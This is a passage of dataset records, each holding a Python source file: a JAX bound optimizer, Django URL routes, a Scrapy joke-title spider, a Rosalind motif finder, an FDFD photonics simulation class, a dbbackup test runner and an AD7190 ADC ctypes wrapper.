= num_steps\n self._step_size = step_size\n self._optimize_dual = optimize_dual\n\n def optimize_fun(self, non_convex_bound: nonconvex.NonConvexBound,\n ) -> Callable[[ParamSet, ParamSet], ParamSet]:\n \"\"\"Returns a function optimizing the primal variables.\n\n Args:\n non_convex_bound: NonConvex object to define the objective function over\n Returns:\n optimize: Optimization function.\n \"\"\"\n # If we are going to actually perform optimization, define the function to\n # minimize (either the primal, or the negative of the dual),\n # its gradient and the projection function to use.\n if self._num_steps:\n def fun_to_opt(opt_vars, objectives):\n if self._optimize_dual:\n _, dual_vals = non_convex_bound.dual(opt_vars, objectives)\n obj = -jnp.sum(dual_vals)\n else:\n obj, _ = non_convex_bound.primal_sumfn(opt_vars, objectives)\n return obj\n grad_fun = jax.grad(fun_to_opt)\n proj_fun = lambda x: jnp.clip(x, 0., 1.)\n\n # Define the optimizer. Because we are minimizing the objective function,\n # we will scale the gradient by a negative step size.\n tx = optax.scale(-self._step_size)\n\n # Define the function to optimize a chunk of the nodes of the activation.\n def optimize(objectives: ParamSet, var_set: ParamSet) -> ParamSet:\n\n # Perform the optimization.\n if self._num_steps:\n state = tx.init(var_set)\n\n def opt_step(_, state_and_var):\n state, var_set = state_and_var\n grads = grad_fun(var_set, objectives)\n updates, new_state = tx.update(grads, state, var_set)\n unc_var_set = optax.apply_updates(var_set, updates)\n new_var_set = jax.tree_map(proj_fun, unc_var_set)\n return new_state, new_var_set\n\n _, var_set = jax.lax.fori_loop(0, self._num_steps, opt_step,\n (state, var_set))\n\n return var_set\n\n return optimize\n\n","sub_path":"jax_verify/src/nonconvex/optimizers.py","file_name":"optimizers.py","file_ext":"py","file_size_in_byte":24637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"291998991","text":"\"\"\"qrating URL Configuration\r\n\r\nThe `urlpatterns` list routes URLs to views. For more information please see:\r\n https://docs.djangoproject.com/en/1.11/topics/http/urls/\r\nExamples:\r\nFunction views\r\n 1. Add an import: from my_app import views\r\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\r\nClass-based views\r\n 1. Add an import: from other_app.views import Home\r\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\r\nIncluding another URLconf\r\n 1. Import the include() function: from django.conf.urls import url, include\r\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\r\n\"\"\"\r\nfrom django.conf.urls import url\r\nfrom django.contrib import admin\r\nfrom django.urls import path\r\n\r\nfrom accounts import views as accounts_views\r\nfrom blog import views\r\n\r\nfrom django.conf import settings\r\nfrom django.conf.urls.static import static\r\n\r\nurlpatterns = [\r\n url(r'^admin/', admin.site.urls),\r\n\r\n url(r'^$', views.home, name = \"home\"),\r\n path('question/', views.detail_question, name = \"detail_question\"),\r\n url(r'^create_question/$', views.create_question, name = \"create_question\"),\r\n path('question//remove/', views.question_remove, name='question_remove'),\r\n path('question//update/', views.question_update, name='question_update'),\r\n path('select//', views.select_question, name='select_question'),\r\n path('answer_remove//',views.answer_remove, name='answer_remove'),\r\n path('answer_update//',views.answer_update, name='answer_update'),\r\n path('search', views.search, name='search'),\r\n path('cate_search//', views.cate_search, name=\"cate_search\"),\r\n \r\n \r\n\r\n # accounts\r\n url(r'^register/$', accounts_views.register, name='register'),\r\n url(r'^logout/$', accounts_views.logout, name = 'logout'),\r\n url(r'^login/$', accounts_views.login, name='login'),\r\n path('mypage/', accounts_views.mypage, name='mypage'),\r\n path('change_pw/', accounts_views.change_pw, name='change_pw'),\r\n path('send_email/', accounts_views.send_email, name='send_email'),\r\n path('activate//', accounts_views.activate, name='activate'),\r\n path('change_info/', accounts_views.change_info, name='change_info'),\r\n]\r\nurlpatterns += static(settings.MEDIA_URL, document_root = settings.MEDIA_ROOT)","sub_path":"qrating/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"592611160","text":"\r\nimport math\r\nx=input (\"Введите х: \")\r\nq=input (\"Введите q: \")\r\ncos = 1\r\ncount = 1\r\nzn = -1\r\nx2 = x*x\r\nf = 2 \r\nn = 2\r\nwhile ((x2/f) >= q ):\r\n cos = cos + zn*x2/f\r\n count = count + 1\r\n n = n + 2\r\n x2 = x2 * x * x\r\n f = f * (n - 1) * n\r\n zn = zn * (-1)\r\n print(\"cos(x): \"+str(cos))\r\n\r\n","sub_path":"задача 4.py","file_name":"задача 4.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"530185524","text":"import numpy as np\nimport pandas as pd\nfrom sklearn import linear_model\nfrom sklearn.model_selection import cross_val_score\n\nfeatures = ['Feature 1','Feature 2','Feature 3','Feature 4','Feature 5 (meaningless but please still use it)', 'Feature 6','Feature 7','Feature 8','Feature 9','Feature 10']\n\ndata = pd.read_csv(\"C:\\\\Users\\\\ericj\\\\PycharmProjects\\\\Assignment1\\\\The SUM dataset, with noise.csv\", sep=\";\" , nrows = 100)\nX, y = data.loc[:,features], data[\"Noisy Target\"]\nmodel = linear_model.Ridge(normalize=True)\n\n# RMS Error\nmean_squared_error= cross_val_score(model,X,y,cv=10,scoring=\"neg_mean_squared_error\") * -1\nroot_mean_squared_error = np.sqrt(mean_squared_error)\n# Absoulte mean error\nabs_mean_error = cross_val_score(model, X, y, cv=10, scoring=\"neg_mean_absolute_error\")\nabs_mean_error = abs_mean_error * -1\nabs_mean_error = abs_mean_error.mean()\n# R2 score\nr2_score = cross_val_score(model, X, y, cv = 10, scoring = \"r2\")\n# Median absolute error\nmedian_absolute_error = cross_val_score(model, X, y, cv = 10, scoring = \"neg_median_absolute_error\") * -1\n# Mean squared log error\nmean_squared_log_error = cross_val_score(model, X, y, cv = 10, scoring = \"neg_mean_squared_log_error\") * -1\n\nprint(\"Mean squared log error with sample size of 10000 =\", mean_squared_log_error.mean())\nprint(\"Median absolute error with sample size of 10000 =\", median_absolute_error.mean())\nprint(\"R2 score with sample size of 10000 =\", r2_score.mean())\nprint(\"RMS error with sample size of 10000 =\", root_mean_squared_error)\nprint(\"Absolute mean error with sample size of 10000 for absolute mean error =\", abs_mean_error)\n","sub_path":"Task3/RidgeRegression-SUMwithNoise.py","file_name":"RidgeRegression-SUMwithNoise.py","file_ext":"py","file_size_in_byte":1613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"66881592","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Feb 5 09:53:55 2020\r\n\r\n@author: AMS\r\n\"\"\"\r\n\r\nfrom AMS_NLP import clusterizar , parameter_cluster\r\nimport pandas as pd\r\nfrom time import time\r\n\r\nmeses = ['Septiembre', 'Octubre', 'Noviembre','Diciembre', 'Enero 2020']\r\ndf = pd.read_excel('C:/Users/Andres/Desktop/Tesseracto/NLP/OVCC/data/OVCC Agosto.xlsx')\r\nfor i in meses:\r\n aux = pd.read_excel('C:/Users/Andres/Desktop/Tesseracto/NLP/OVCC/data/OVCC {}.xlsx'.format(i))\r\n df = pd.concat([df,aux])\r\n \r\ndataFilter = df[['Operación','Riesgo','Pregunta','Instrucciones','Respuesta','Comentarios']]\r\ndataFilter = dataFilter[(dataFilter['Respuesta']== 'No') | (dataFilter['Respuesta'].isnull())]\r\n#----- eleccion de riesgo de operacion\r\ndataRiesgo = dataFilter[(dataFilter['Operación'] == 'Cerro Colorado') & (dataFilter['Riesgo'] == 'Accidente en Maniobras de Izaje')]\r\ndataRiesgoFilter = dataRiesgo['Comentarios'].values\r\n\r\nclustered_sentences, centroides = clusterizar(dataRiesgoFilter, model = 'affinity',)\r\nparameter, representative_sentences = parameter_cluster(clustered_sentences, centroides)\r\n\r\nd = {'Mas representativa': representative_sentences, 'Cluster': clustered_sentences}\r\nexcel = pd.DataFrame(data = d)\r\n\r\nexcel.to_excel('AccidenteRuta.xlsx', index= False)","sub_path":"OVCC/scripts/Clusterizar.py","file_name":"Clusterizar.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"469700089","text":"import scrapy\nfrom joker.items import JokerItem\n\n\nclass JokerSpider(scrapy.Spider):\n name = \"joker\"\n allowed_domains = [\"hupu.com\"]\n start_urls = []\n\n def __init__(self):\n super(JokerSpider, self).__init__()\n self.index = 1\n self.url_pre = \"http://my.hupu.com/search?q=%A1%B6%B2%BB%C0%E4%D0%A6%BB%B0%A1%B7%B5%DA&type=topic&page=\"\n self.url_post = \"&fid=34&sortby=datedesc\"\n url = self.url_pre + str(self.index) + self.url_post\n self.start_urls.append(url)\n # for i in xrange(1,31):\n # url = \"http://my.hupu.com/search?q=%A1%B6%B2%BB%C0%E4%D0%A6%BB%B0%A1%B7%B5%DA&type=topic&page=\" + str(i) + \"&fid=34&sortby=datedesc\"\n # self.start_urls.append(url)\n\n def parse(self, response):\n for line in response.xpath('//table/tbody/tr/td[1]/a'):\n item = JokerItem()\n item['title'] = line.xpath('text()').extract()\n item['link'] = line.xpath('@href').extract()[0]\n yield item\n\n self.index = self.index + 1\n if self.index < 32:\n url = self.url_pre + str(self.index) + self.url_post\n yield scrapy.Request(url, self.parse)\n\n","sub_path":"joker/spiders/joker_spider.py","file_name":"joker_spider.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"195456691","text":"#!/usr/bin/env python3\n\n########################################################################\n\n# The N-glycosylation motif looks a lot like a regular expression. I\n# suppose now is as good a time as any to dive into the Python re\n# package and really figure out what's what.\n\n########################################################################\n\nimport sys\nfrom urllib.request import urlopen\nimport regex\n\nglyco_pattern=\"N[^P][ST][^P]\"\nuniprot_base = \"http://www.uniprot.org/uniprot/{0}.fasta\"\n\ndef protein_string(url):\n \"\"\"Returns the protein string of the FASTA file at the given\n URL.\"\"\"\n\n assert url[-5:] == \"fasta\"\n data = \"\"\n for line in urlopen(url):\n x = line.decode().strip()\n if x[0] != '>':\n data += x\n return data\n\ndef find_motif(string, pattern):\n \"\"\"Returns all (overlapping) locations of the motif pattern\n in string.\"\"\"\n\n g = list()\n for match in regex.finditer(pattern, string, overlapped=True):\n g.append(match.start())\n return g\n \n\nif __name__==\"__main__\":\n names = list()\n urls = list()\n seqs = list()\n\n for sequence in sys.stdin:\n sequence = sequence.strip()\n names.append(sequence)\n urls.append(uniprot_base.format(sequence))\n\n for url in urls:\n seqs.append(protein_string(url))\n\n for x in zip(names, seqs):\n locations = find_motif(x[1], glyco_pattern)\n if locations:\n print(x[0])\n for location in locations:\n print(location+1, end=\" \") # \n print(\"\")\n","sub_path":"problems/level-5/mprt/mprt.py","file_name":"mprt.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"125894458","text":"#\n# System\n#\nimport sys\nimport os\n\n#\n# Math\n#\nimport numpy as np\nimport scipy.optimize\n\nfrom scipy.ndimage import gaussian_filter\nfrom scipy.interpolate import RectBivariateSpline\n\nsys.path.insert(1, '../')\nimport heaviside\n\niter_idx = 0\nfom_evolution = []\nbinarization_evolution = []\n\n#\n# Electromagnetics\n#\nrun_on_cluster = True\n\nif run_on_cluster:\n\tsys.path.append( '/central/home/gdrobert/Develompent/ceviche' )\nimport ceviche\n\n#\n# Topology Optimization\n#\npython_src_directory = os.path.abspath(os.path.join(os.path.dirname(__file__), '.'))\n\neps_nought = 8.854 * 1e-12\nmu_nought = 1.257 * 1e-6 \nc = 3.0 * 1e8\nsmall = 1e-10\n\ndef upsample( input_block, factor ):\n\tinput_block_size = input_block.shape\n\toutput_block_size = [ int( k * factor ) for k in input_block_size ]\n\n\toutput_block = np.zeros( output_block_size, input_block.dtype )\n\n\tfor x_idx in range( 0, output_block_size[ 0 ] ):\n\t\tfor y_idx in range( 0, output_block_size[ 1 ] ):\n\t\t\toutput_block[ x_idx, y_idx ] = input_block[ int( x_idx / factor ), int( y_idx / factor ) ]\n\n\treturn output_block\n\nclass DeepEM():\n\n\tdef __init__( self,\n\t\tdevice_size_voxels, num_layers, coarsen_factor, mesh_size_nm,\n\t\tpermittivity_bounds, focal_length_y_voxels,\n\t\twavelength_um, random_seed, save_folder ):\n\t\t\n\t\tself.device_width_voxels = device_size_voxels[ 0 ]\n\t\tself.device_height_voxels = device_size_voxels[ 1 ]\n\n\t\tself.coarsen_factor = coarsen_factor\n\t\tassert ( self.device_width_voxels % coarsen_factor ) == 0, \"The specified coarsening factor does not evenly divide the device width in voxels!\"\n\t\tassert ( self.device_height_voxels % coarsen_factor ) == 0, \"The specified coarsening factor does not evenly divide the device height in voxels!\"\n\n\t\tself.design_width_voxels = int( device_size_voxels[ 0 ] / coarsen_factor )\n\t\tself.design_height_voxels = int( device_size_voxels[ 1 ] / coarsen_factor )\n\n\t\tself.design_density = None\n\n\t\tself.mesh_size_nm = mesh_size_nm\n\t\tself.mesh_size_um = 1e-3 * mesh_size_nm\n\t\tself.mesh_size_m = 1e-9 * mesh_size_nm\n\n\t\tself.device_size_um = [ self.mesh_size_um * device_size_voxels[ idx ] for idx in range( 0, len( device_size_voxels ) ) ]\n\n\t\tself.permittivity_bounds = permittivity_bounds\n\t\tself.min_relative_permittivity = permittivity_bounds[ 0 ]\n\t\tself.max_relative_permittivity = permittivity_bounds[ 1 ]\n\n\t\tself.focal_length_y_voxels = focal_length_y_voxels\n\t\tself.wavelength_um = wavelength_um\n\n\t\tself.omega = 2 * np.pi * c / ( 1e-6 * wavelength_um )\n\n\t\tself.random_seed = random_seed\n\t\tnp.random.seed( self.random_seed )\n\n\t\tassert( self.design_height_voxels % num_layers ) == 0, \"Expected the number of layers to evenly divide the design region\"\n\n\t\tself.num_layers = num_layers\n\t\tself.design_voxels_per_layer = int( self.design_height_voxels / num_layers )\n\n\t\tself.setup_simulation()\n\n\tdef plot_geometry( self, opt_mask=None ):\n\t\timport matplotlib.pyplot as plt\n\n\t\tdevice_region = np.zeros( ( self.simulation_width_voxels, self.simulation_height_voxels ) )\n\t\tdevice_region[ self.device_width_start : self.device_width_end, self.device_height_start : self.device_height_end ] = 100 * np.imag(\n\t\t\tupsample( self.density_to_permittivity( self.design_density ), self.coarsen_factor )\n\t\t)\n\n\t\tdevice_region[\n\t\t\tself.focal_x_start : self.focal_x_end,\n\t\t\tself.focal_point_y - 5 : self.focal_point_y + 5 ] = 2\n\n\t\tplt.subplot( 2, 2, 1 )\n\t\tplt.imshow( np.real( self.fwd_source ) )\n\t\tplt.title( 'Forward Source' )\n\t\tplt.subplot( 2, 2, 2 )\n\t\tplt.imshow( device_region )\n\t\tplt.title( 'Focal Y' )\n\t\tplt.subplot( 2, 2, 3 )\n\t\tplt.imshow( device_region )\n\t\tplt.title( 'Device Region' )\n\t\tplt.show()\n\n\n\tdef gen_random_device( self ):\n\t\tnum_random_values = self.design_width_voxels * self.num_layers\n\n\t\trandom_design_values = np.random.random( num_random_values )\n\n\t\tdef apply_sigmoid( variable_in, beta, eta ):\n\t\t\tnumerator = np.add(np.tanh(beta * eta), np.tanh(np.multiply(beta, np.subtract(variable_in, eta))))\n\n\t\t\tnumerator = np.tanh( beta * eta ) + np.tanh( beta * ( variable_in - eta ) )\n\t\t\tdenominator = np.tanh( beta * eta ) + np.tanh( beta * ( 1 - eta ) )\n\n\t\t\treturn ( numerator / denominator )\n\n\t\tbeta = 0.0625 + 20.0 * np.random.random()\n\t\teta = 0.1 + 0.8 * np.random.random()\n\n\t\trandom_design_values = apply_sigmoid( random_design_values, beta, eta )\n\n\t\tself.design_density = np.ones( [ self.design_width_voxels, self.design_height_voxels ] )\n\n\t\tfor layer_idx in range( 0, self.num_layers ):\n\t\t\tlayer_start = layer_idx * self.design_voxels_per_layer\n\t\t\tlayer_end = layer_start + self.design_voxels_per_layer\n\n\t\t\trandom_values_start = layer_idx * self.design_width_voxels\n\t\t\trandom_values_end = random_values_start + self.design_width_voxels\n\n\t\t\tfill_data = random_design_values[ random_values_start : random_values_end ]\n\n\t\t\tfor internal_layer_idx in range( layer_start, layer_end ):\n\t\t\t\tself.design_density[ :, internal_layer_idx ] = fill_data\n\n\t\tself.design_density = np.maximum( 0, np.minimum( self.design_density, 1 ) )\n\n\tdef setup_simulation( self ):\n\t\tself.width_gap_voxels = int( 1.0 * self.wavelength_um / self.mesh_size_um )\n\t\tself.height_gap_voxels_top = int( 1.5 * self.wavelength_um / self.mesh_size_um )\n\t\tself.height_gap_voxels_bottom = self.width_gap_voxels\n\t\tself.pml_voxels = int( 1.0 * self.wavelength_um / self.mesh_size_um )\n\n\t\tself.simulation_width_voxels = self.device_width_voxels + 2 * self.width_gap_voxels + 2 * self.pml_voxels\n\t\tself.simulation_height_voxels = self.device_height_voxels + np.maximum( self.focal_length_y_voxels, 0 ) + self.height_gap_voxels_bottom + self.height_gap_voxels_top + 2 * self.pml_voxels\n\n\t\tself.device_width_start = int( 0.5 * ( self.simulation_width_voxels - self.device_width_voxels ) )\n\t\tself.device_width_end = self.device_width_start + self.device_width_voxels\n\t\tself.device_height_start = int( self.pml_voxels + self.height_gap_voxels_bottom + np.maximum( self.focal_length_y_voxels, 0 ) )\n\t\tself.device_height_end = self.device_height_start + self.device_height_voxels\n\n\t\tself.fwd_src_y = int( self.pml_voxels + self.height_gap_voxels_bottom + np.maximum( self.focal_length_y_voxels, 0 ) + self.device_height_voxels + 0.75 * self.height_gap_voxels_top )\n\t\tself.focal_point_y = int( self.pml_voxels + self.height_gap_voxels_bottom - np.minimum( self.focal_length_y_voxels, 0 ) )\n\n\t\tself.focal_x_start = self.pml_voxels\n\t\tself.focal_x_end = self.focal_x_start + 2 * self.width_gap_voxels + self.device_width_voxels\n\n\t\tself.rel_eps_simulation = np.ones( ( self.simulation_width_voxels, self.simulation_height_voxels ), dtype=np.complex )\n\n\t\tfwd_src_x_range = np.arange( 0, self.simulation_width_voxels )\n\t\tfwd_src_y_range = self.fwd_src_y * np.ones( fwd_src_x_range.shape, dtype=int )\n\n\t\tself.fwd_source = np.zeros( ( self.simulation_width_voxels, self.simulation_height_voxels ), dtype=np.complex )\n\t\tself.fwd_source[ fwd_src_x_range, fwd_src_y_range ] = 1\n\n\n\tdef get_device_efields( self ):\n\t\timport_density = upsample( self.design_density, self.coarsen_factor )\n\t\tdevice_permittivity = self.density_to_permittivity( import_density )\n\t\tself.rel_eps_simulation[ self.device_width_start : self.device_width_end, self.device_height_start : self.device_height_end ] = device_permittivity\n\n\t\tEz = self.compute_forward_fields( self.omega, device_permittivity )\n\n\t\treturn Ez[ self.device_width_start : self.device_width_end, self.device_height_start : self.device_height_end ]\n\n\tdef get_focal_efields( self ):\n\t\timport_density = upsample( self.design_density, self.coarsen_factor )\n\t\tdevice_permittivity = self.density_to_permittivity( import_density )\n\t\tself.rel_eps_simulation[ self.device_width_start : self.device_width_end, self.device_height_start : self.device_height_end ] = device_permittivity\n\n\t\tEz = self.compute_forward_fields( self.omega, device_permittivity )\n\n\t\treturn Ez[ self.focal_x_start : self.focal_x_end, self.focal_point_y ]\n\n\tdef compute_forward_fields( self, omega, device_permittivity ):\n\t\tself.rel_eps_simulation[ self.device_width_start : self.device_width_end, self.device_height_start : self.device_height_end ] = device_permittivity\n\n\t\tsimulation = ceviche.fdfd_ez( omega, self.mesh_size_m, self.rel_eps_simulation, [ self.pml_voxels, self.pml_voxels ] )\n\t\tfwd_Hx, fwd_Hy, fwd_Ez = simulation.solve( self.fwd_source )\n\n\t\treturn fwd_Ez\n\n\tdef density_to_permittivity( self, density ):\n\t\treturn ( self.min_relative_permittivity + ( self.max_relative_permittivity - self.min_relative_permittivity ) * density )\n\n\n\n","sub_path":"inverse_design/Landscape/DeepEM.py","file_name":"DeepEM.py","file_ext":"py","file_size_in_byte":8379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"57973404","text":"#!/usr/bin/env python\n\"\"\"\nConfiguration and launcher for dbbackup tests.\n\"\"\"\nimport os\nimport sys\nimport django\nfrom django.conf import settings\nfrom django.core.management import execute_from_command_line\nimport dj_database_url\n\n\n# Add testproject dbbackup in path\nHERE = os.path.dirname(os.path.abspath(__file__))\nPARENT_DIR = os.path.dirname(HERE)\nsys.path[0:0] = [HERE, PARENT_DIR]\n\n# Settings\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nMEDIA_ROOT = os.path.join(BASE_DIR, 'tests/media')\nINSTALLED_APPS = (\n 'testapp',\n 'dbbackup',\n)\nGPG_RECIPIENT = \"test@test\"\nDATABASE = dj_database_url.config(default='sqlite:///%s' %\n os.path.join(HERE, 'test-sqlite'))\nDBBACKUP_STORAGE = os.environ.get('STORAGE', 'dbbackup.tests.utils')\nDBBACKUP_STORAGE_OPTIONS = dict([keyvalue.split('=') for keyvalue in\n os.environ.get('STORAGE_OPTIONS', '').split(',')\n if keyvalue])\nDATABASE.update({\n 'TEST': {'NAME': DATABASE['NAME']},\n 'TEST_NAME': DATABASE['NAME']\n})\n\nsettings.configure(\n ADMIN=('foo@bar'),\n ALLOWED_HOSTS=['*'],\n MEDIA_ROOT=MEDIA_ROOT,\n MIDDLEWARE_CLASSES=(),\n # CACHES={'default': {'BACKEND': 'django.core.cache.backends.locmem.LocMemCache'}},\n INSTALLED_APPS=INSTALLED_APPS,\n DATABASES={'default': DATABASE},\n ROOT_URLCONF='testapp.urls',\n SECRET_KEY=\"it's a secret to everyone\",\n SITE_ID=1,\n BASE_DIR=BASE_DIR,\n DBBACKUP_GPG_RECIPIENT=GPG_RECIPIENT,\n DBBACKUP_GPG_ALWAYS_TRUST=True,\n DBBACKUP_STORAGE=DBBACKUP_STORAGE,\n DBBACKUP_STORAGE_OPTIONS=DBBACKUP_STORAGE_OPTIONS\n)\n\n\ndef main():\n if django.VERSION >= (1, 7):\n django.setup()\n command_args = sys.argv[:] if sys.argv[1:] else ['', 'test', 'dbbackup']\n execute_from_command_line(command_args)\n exit(0)\n\nif __name__ == '__main__':\n main()\n","sub_path":"tests/runtests.py","file_name":"runtests.py","file_ext":"py","file_size_in_byte":1903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"315898261","text":"from ctypes import *\n\ndll = CDLL(\"ad7190_linux/ad7190.so\")\n\n# SPI slave device ID\nSLAVE_ID = 1\n\n# AD7190 Register Map\nREG_COMM = 0 # Communications Register (WO, 8-bit) \nREG_STAT = 0 # Status Register (RO, 8-bit) \nREG_MODE = 1 # Mode Register (RW, 24-bit \nREG_CONF = 2 # Configuration Register (RW, 24-bit)\nREG_DATA = 3 # Data Register (RO, 24/32-bit) \nREG_ID = 4 # ID Register (RO, 8-bit) \nREG_GPOCON = 5 # GPOCON Register (RW, 8-bit) \nREG_OFFSET = 6 # Offset Register (RW, 24-bit \nREG_FULLSCALE = 7 # Full-Scale Register (RW, 24-bit)\n\n# Communications Register Bit Designations (AD7190_REG_COMM)\nCOMM_WEN = (1 << 7) # Write Enable. \nCOMM_WRITE = (0 << 6) # Write Operation.\nCOMM_READ = (1 << 6) # Read Operation. \nCOMM_ADDR = lambda x: (((x) & 0x7) << 3) # Register Address. \nCOMM_CREAD = (1 << 2) # Continuous Read of Data Register.\n\n# Status Register Bit Designations (AD7190_REG_STAT)\nSTAT_RDY = (1 << 7) # Ready.\nSTAT_ERR = (1 << 6) # ADC error bit.\nSTAT_NOREF = (1 << 5) # Error no external reference. \nSTAT_PARITY = (1 << 4) # Parity check of the data register. \nSTAT_CH2 = (1 << 2) # Channel 2. \nSTAT_CH1 = (1 << 1) # Channel 1. \nSTAT_CH0 = (1 << 0) # Channel 0. \n\n# Mode Register Bit Designations (AD7190_REG_MODE)\nMODE_SEL = lambda x: (((x) & 0x7) << 21) # Operation Mode Select.\nMODE_DAT_STA = (1 << 20) # Status Register transmission.\nMODE_CLKSRC = lambda x: (((x) & 0x3) << 18) # Clock Source Select.\nMODE_SINC3 = (1 << 15) # SINC3 Filter Select.\nMODE_ENPAR = (1 << 13) # Parity Enable.\nMODE_SCYCLE = (1 << 11) # Single cycle conversion.\nMODE_REJ60 = (1 << 10) # 50/60Hz notch filter.\nMODE_RATE = lambda x: ((x) & 0x3FF) # Filter Update Rate Select.\n\n# Mode Register: AD7190_MODE_SEL(x) options\nMODE_CONT = 0 # Continuous Conversion Mode.\nMODE_SINGLE = 1 # Single Conversion Mode.\nMODE_IDLE = 2 # Idle Mode.\nMODE_PWRDN = 3 # Power-Down Mode.\nMODE_CAL_INT_ZERO = 4 # Internal Zero-Scale Calibration.\nMODE_CAL_INT_FULL = 5 # Internal Full-Scale Calibration.\nMODE_CAL_SYS_ZERO = 6 # System Zero-Scale Calibration.\nMODE_CAL_SYS_FULL = 7 # System Full-Scale Calibration.\n\n# Mode Register: AD7190_MODE_CLKSRC(x) options\nCLK_EXT_MCLK1_2 = 0 # External crystal. The external crystal\n # is connected from MCLK1 to MCLK2.\nCLK_EXT_MCLK2 = 1 # External Clock applied to MCLK2 \nCLK_INT = 2 # Internal 4.92 MHz clock. \n # Pin MCLK2 is tristated.\nCLK_INT_CO = 3 # Internal 4.92 MHz clock. The internal\n # clock is available on MCLK2.\n\n# Configuration Register Bit Designations (AD7190_REG_CONF)\nCONF_CHOP = (1 << 23) # CHOP enable.\nCONF_REFSEL = (1 << 20) # REFIN1/REFIN2 Reference Select.\nCONF_CHAN = lambda x: (((x) & 0xFF) << 8) # Channel select.\nCONF_BURN = (1 << 7) # Burnout current enable.\nCONF_REFDET = (1 << 6) # Reference detect enable.\nCONF_BUF = (1 << 4) # Buffered Mode Enable.\nCONF_UNIPOLAR = (1 << 3) # Unipolar/Bipolar Enable.\nCONF_GAIN = lambda x: ((x) & 0x7) # Gain Select.\n\n# Configuration Register: AD7190_CONF_CHAN(x) options\nCH_AIN1P_AIN2M = 0 # AIN1(+) - AIN2(-) \nCH_AIN3P_AIN4M = 1 # AIN3(+) - AIN4(-) \nCH_TEMP_SENSOR = 2 # Temperature sensor \nCH_AIN2P_AIN2M = 3 # AIN2(+) - AIN2(-) \nCH_AIN1P_AINCOM = 4 # AIN1(+) - AINCOM \nCH_AIN2P_AINCOM = 5 # AIN2(+) - AINCOM \nCH_AIN3P_AINCOM = 6 # AIN3(+) - AINCOM \nCH_AIN4P_AINCOM = 7 # AIN4(+) - AINCOM\n\n# Configuration Register: AD7190_CONF_GAIN(x) options\n# ADC Input Range (5 V Reference)\nCONF_GAIN_1 = 0 # Gain 1 +-5 V\nCONF_GAIN_8 = 3 # Gain 8 +-625 mV\nCONF_GAIN_16 = 4 # Gain 16 +-312.5 mV\nCONF_GAIN_32 = 5 # Gain 32 +-156.2 mV\nCONF_GAIN_64 = 6 # Gain 64 +-78.125 mV\nCONF_GAIN_128 = 7 # Gain 128 +-39.06 mV\n\n# ID Register Bit Designations (AD7190_REG_ID)\nID = 0x4\nID_MASK = 0x0F\n\n# GPOCON Register Bit Designations (AD7190_REG_GPOCON)\nGPOCON_BPDSW = (1 << 6) # Bridge power-down switch enable\nGPOCON_GP32EN = (1 << 5) # Digital Output P3 and P2 enable\nGPOCON_GP10EN = (1 << 4) # Digital Output P1 and P0 enable\nGPOCON_P3DAT = (1 << 3) # P3 state\nGPOCON_P2DAT = (1 << 2) # P2 state\nGPOCON_P1DAT = (1 << 1) # P1 state\nGPOCON_P0DAT = (1 << 0) # P0 state\n\n\n# Writes data into a register.\ndll.AD7190_SetRegisterValue.restype = None\ndll.AD7190_SetRegisterValue.argtypes = [c_ubyte, c_ulong, c_ubyte, c_ubyte]\ndef set_register_value(*args):\n return dll.AD7190_SetRegisterValue(*args);\n\n# Reads the value of a register.\ndll.AD7190_GetRegisterValue.restype = c_ulong\ndll.AD7190_GetRegisterValue.argtypes = [c_ubyte, c_ubyte, c_ubyte];\ndef get_register_value(*args):\n return dll.AD7190_GetRegisterValue(*args)\n\n# Checks if the AD7139 part is present.\ndll.AD7190_Init.restype = c_ubyte\ndll.AD7190_Init.argtypes = [];\ndef init(*args):\n return dll.AD7190_Init(*args)\n\n# Resets the device.\ndll.AD7190_Reset.restype = None\ndll.AD7190_Reset.argtypes = [];\ndef reset(*args):\n return dll.AD7190_Reset(*args)\n\n# Set device to idle or power-down.\ndll.AD7190_SetPower.restype = None\ndll.AD7190_SetPower.argtypes = [c_ubyte];\ndef set_power(*args):\n return dll.AD7190_SetPower(*args)\n\n# Waits for RDY pin to go low.\ndll.AD7190_WaitRdyGoLow.restype = None\ndll.AD7190_WaitRdyGoLow.argtypes = [];\ndef wait_rdy_go_low(*args):\n return dll.AD7190_WaitRdyGoLow(*args)\n\n# Selects the channel to be enabled.\ndll.AD7190_ChannelSelect.restype = None\ndll.AD7190_ChannelSelect.argtypes = [c_ushort];\ndef channel_select(*args):\n return dll.AD7190_ChannelSelect(*args)\n\n# Performs the given calibration to the specified channel.\ndll.AD7190_Calibrate.restype = None\ndll.AD7190_Calibrate.argtypes = [c_ubyte, c_ubyte];\ndef calibrate(*args):\n return dll.AD7190_Calibrate(*args)\n\n# Selects the polarity of the conversion and the ADC input range.\ndll.AD7190_RangeSetup.restype = None\ndll.AD7190_RangeSetup.argtypes = [c_ubyte, c_ubyte];\ndef range_setup(*args):\n return dll.AD7190_RangeSetup(*args)\n\n# Returns the result of a single conversion.\ndll.AD7190_SingleConversion.restype = c_ulong\ndll.AD7190_SingleConversion.argtypes = [];\ndef single_conversion(*args):\n return dll.AD7190_SingleConversion(*args)\n\n# Returns the average of several conversion results.\ndll.AD7190_ContinuousReadAvg.restype = 